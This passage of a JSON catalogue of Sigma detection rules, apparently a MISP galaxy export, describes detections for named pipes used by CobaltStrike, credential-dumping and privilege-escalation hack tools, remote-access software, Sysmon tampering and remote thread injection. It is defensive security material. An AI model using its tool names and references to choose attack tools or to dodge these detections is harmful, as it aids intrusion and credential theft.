"b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", "value": "DNS Query Request By Regsvr32.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113, Connor Martin", "creation_date": "2022-07-11", "falsepositive": [ "Likely with other browser software. Apply additional filters for any other browsers you might use." 
], "filename": "dns_query_win_remote_access_software_domains_non_browsers.yml", "level": "medium", "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ "https://blog.sekoia.io/scattered-spider-laying-new-eggs/", "https://redcanary.com/blog/misbehaving-rats/", "https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", "https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "value": "DNS Query To Remote Access Software Domain From Non-Browser App" }, { "description": "Detects the creation of a named pipe seen used by known APTs or malware.", "meta": { "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "creation_date": "2017-11-06", "falsepositive": [ "Unknown" ], "filename": "pipe_created_susp_malicious_namedpipes.yml", "level": "critical", "logsource.category": "pipe_created", 
"logsource.product": "windows", "refs": [ "https://securelist.com/faq-the-projectsauron-apt/75533/", "https://www.us-cert.gov/ncas/alerts/TA17-117A", "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", "https://github.com/RiccardoAncarani/LiquidSnake", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "value": "Malicious Named Pipe Created" }, { "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", "meta": { "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Chrome instances using the exact same pipe name \"mojo.xxx\"", "Websense Endpoint using the pipe name \"DserNamePipe(R|W)\\d{1,5}\"" ], "filename": 
"pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055", "stp.1k" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "value": "CobaltStrike Named Pipe Patterns" }, { "description": "Detects default RemCom pipe creation", "meta": { "author": "Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Legitimate Administrator activity" ], "filename": "pipe_created_pua_remcom_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/kavika13/RemCom", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d36f87ea-c403-44d2-aa79-1a0ac7c24456", "value": "PUA - RemCom Default Named Pipe" }, { "description": "Detects 
suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2021-10-08", "falsepositive": [ "Unknown" ], "filename": "pipe_created_adfs_namedpipe_connection_uncommon_tool.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/Azure/SimuLand", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", "https://o365blog.com/post/adfs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml" ], "tags": [ "attack.collection", "attack.t1005" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", "value": "ADFS Database Named Pipe Connection By Uncommon Tool" }, { "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_cobaltstrike_re.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { 
"dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "value": "CobaltStrike Named Pipe Pattern Regex" }, { "description": "Detects PAExec default named pipe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-26", "falsepositive": [ "Unknown" ], "filename": "pipe_created_pua_paexec_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", "https://github.com/poweradminllc/PAExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "value": "PUA - PAExec Default Named Pipe" }, { "description": "Detects default CSExec pipe creation", "meta": { "author": "Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-07", "falsepositive": [ "Legitimate Administrator activity" ], "filename": "pipe_created_pua_csexec_default_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/malcomvetter/CSExec", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": 
"4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f318b911-ea88-43f4-9281-0de23ede628e", "value": "PUA - CSExec Default Named Pipe" }, { "description": "Detects the pattern of a pipe name as used by the hack tool CoercedPotato", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-10-11", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_coercedpotato.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://blog.hackvens.fr/articles/CoercedPotato.html", "https://github.com/hackvens/CoercedPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d0083b3-580b-40da-9bba-626c19fe4033", "value": "HackTool - CoercedPotato Named Pipe Creation" }, { "description": "Detects the pattern of a pipe name as used by the hack tool EfsPotato", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "\\pipe\\LOCAL\\Monitorian" ], "filename": "pipe_created_hktl_efspotato.yml", "level": "high", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", "https://github.com/zcgonvh/EfsPotato", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_efspotato.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] 
}, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "value": "HackTool - EfsPotato Named Pipe Creation" }, { "description": "Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unlikely" ], "filename": "pipe_created_hktl_diagtrack_eop.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", "value": "HackTool - DiagTrackEoP Default Named Pipe" }, { "description": "Detects creation of default named pipes used by the Koh tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-08", "falsepositive": [ "Unlikely" ], "filename": "pipe_created_hktl_koh_default_pipe.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1528", "attack.t1134.001" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "value": "HackTool - Koh Default Named Pipe" }, { "description": "Detects the creation of a named pipe as used by CobaltStrike", "meta": { "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "creation_date": "2021-05-25", "falsepositive": [ "Unknown" ], "filename": "pipe_created_hktl_cobaltstrike.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://twitter.com/d4rksystem/status/1357010969264873472", "https://github.com/SigmaHQ/sigma/issues/253", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "value": "CobaltStrike Named Pipe" }, { "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "creation_date": "2019-09-12", "falsepositive": [ "Programs using PowerShell directly without invocation of a dedicated interpreter." 
], "filename": "pipe_created_powershell_alternate_host_pipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "value": "Alternate PowerShell Hosts Pipe" }, { "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location, which could indicate that the tool is being used in an attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-04", "falsepositive": [ "Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment." 
], "filename": "pipe_created_sysinternals_psexec_default_pipe_susp_location.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "value": "PsExec Tool Execution From Suspicious Locations - PipeName" }, { "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-09-01", "falsepositive": [ "Unknown" ], "filename": "pipe_created_scrcons_wmi_consumer_namedpipe.yml", "level": "medium", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml" ], "tags": [ "attack.t1047", "attack.execution" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "value": "WMI Event Consumer Created Named Pipe" }, { "description": "Detects well-known credential dumping tools execution via specific named pipe creation", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-11-01", "falsepositive": [ "Legitimate Administrator using tool for password recovery" ], "filename": 
"pipe_created_hktl_generic_cred_dump_tools_pipes.yml", "level": "critical", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "value": "HackTool - Credential Dumping Tools Named Pipe Created" }, { "description": "Detects the execution of PowerShell via the creation of a named pipe starting with PSHost", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-09-12", "falsepositive": [ "Likely" ], "filename": "pipe_created_powershell_execution_pipe.yml", "level": "informational", "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html", 
"https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "value": "New PowerShell Instance Created" }, { "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", "meta": { "author": "frack113", "creation_date": "2021-06-04", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification_status.yml", "level": "high", "logsource.category": "sysmon_status", "logsource.product": "windows", "refs": [ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f2b5353-573f-4880-8e33-7d04dcf97744", "value": "Sysmon Configuration Modification" }, { "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying to manipulate the configuration", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "value": "Sysmon Configuration Change" }, { "description": "Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.", "meta": { "author": "frack113", "creation_date": "2023-07-20", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_block_shredding.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_shredding.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c3e5c1b1-45e9-4632-b242-27939c170239", "value": "Sysmon Blocked File Shredding" }, { "description": "Detects when an adversary is trying to hide its actions from Sysmon logging based on error messages", "meta": { "author": "frack113", "creation_date": "2021-06-04", "falsepositive": [ "Legitimate administrative action" ], "filename": "sysmon_config_modification_error.yml", "level": "high", "logsource.category": "sysmon_error", "logsource.product": "windows", "refs": [ "https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "value": "Sysmon Configuration 
Error" }, { "description": "Triggers on any Sysmon \"FileExecutableDetected\" event, which triggers every time a PE that is monitored by the config is created.", "meta": { "author": "frack113", "creation_date": "2023-07-20", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_executable_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36", "https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_executable_detected.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "693a44e9-7f26-4cb6-b787-214867672d3a", "value": "Sysmon File Executable Creation Detected" }, { "description": "Triggers on any Sysmon \"FileBlockExecutable\" event, which indicates a violation of the configured block policy", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-16", "falsepositive": [ "Unlikely" ], "filename": "sysmon_file_block_executable.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_file_block_executable.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "23b71bc5-953e-4971-be4c-c896cda73fc2", "value": "Sysmon Blocked Executable" }, { "description": "Detects uncommon processes creating remote threads.", "meta": { "author": "Perez Diego (@darkquassar), oscd.community", "creation_date": "2019-10-27", "falsepositive": [ "This rule is best put in testing first in order to create a baseline that reflects the data in your environment." 
], "filename": "create_remote_thread_win_susp_uncommon_source_image.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io", "Personal research, statistical analysis", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", "value": "Remote Thread Creation By Uncommon Source Image" }, { "description": "Detects remote thread creation in \"KeePass.exe\", which could indicate potential password dumping activity", "meta": { "author": "Timon Hackenjos", "creation_date": "2022-04-22", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_keepass.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://github.com/denandz/KeeFarce", "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/GhostPack/KeeThief", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml" ], "tags": [ "attack.credential-access", "attack.t1555.005" ] }, "related": [ { "dest-uuid": "315f51f0-6b03-4c1e-bfb2-84740afb8e21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "value": "Remote Thread Created In KeePass.EXE" }, { "description": "Detects remote thread creation in command shell applications, such as \"Cmd.EXE\" and \"PowerShell.EXE\".\nIt is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.\n", 
"meta": { "author": "Splunk Research Team", "creation_date": "2024-07-29", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_susp_target_shell_application.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/", "https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_target_shell_application.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9d4d3fa-8fc0-41bc-80b1-30b9fda79d6f", "value": "Remote Thread Created In Shell Application" }, { "description": "Detects the creation of a remote thread from a Powershell process in an uncommon target process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-06-25", "falsepositive": [ "Unknown" ], "filename": "create_remote_thread_win_powershell_susp_targets.yml", "level": "medium", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218.011", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
